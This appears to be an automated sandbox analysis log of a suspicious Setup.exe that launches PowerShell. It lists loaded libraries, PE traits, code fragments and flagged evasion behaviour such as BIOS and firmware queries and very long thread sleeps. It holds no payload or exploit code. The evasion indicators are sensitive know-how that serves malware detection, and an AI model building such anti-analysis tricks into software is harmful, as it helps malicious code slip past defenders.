              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Setup.exeStatic file information: File size 76122589 > 1048576
              Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2a9200
              Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026381820.0000000006D1A000.00000004.00000020.00020000.00000000.sdmp
              Source: Setup.exeStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0102C8AE push eax; retf 0_3_0102C8C9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_010321C6 push edi; retf 0_3_010321D9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_010321C6 push edi; retf 0_3_010321D9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03927AEC push esi; retf 0_3_03927AEF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03927AEC push esi; retf 0_3_03927AEF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03927AEC push esi; retf 0_3_03927AEF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_01036739 pushad ; retf 0_3_01036841
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_010321C6 push edi; retf 0_3_010321D9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_010321C6 push edi; retf 0_3_010321D9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_010368F8 push esi; retf 0_3_010368FB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03927AEC push esi; retf 0_3_03927AEF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03927AEC push esi; retf 0_3_03927AEF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03927AEC push esi; retf 0_3_03927AEF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392880A push ebx; retf 0_3_03928819
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392888B push cs; iretd 0_3_039288A1

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5534Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4163Jump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 1216Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 1368Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4124Thread sleep count: 5534 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep count: 4163 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2208Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
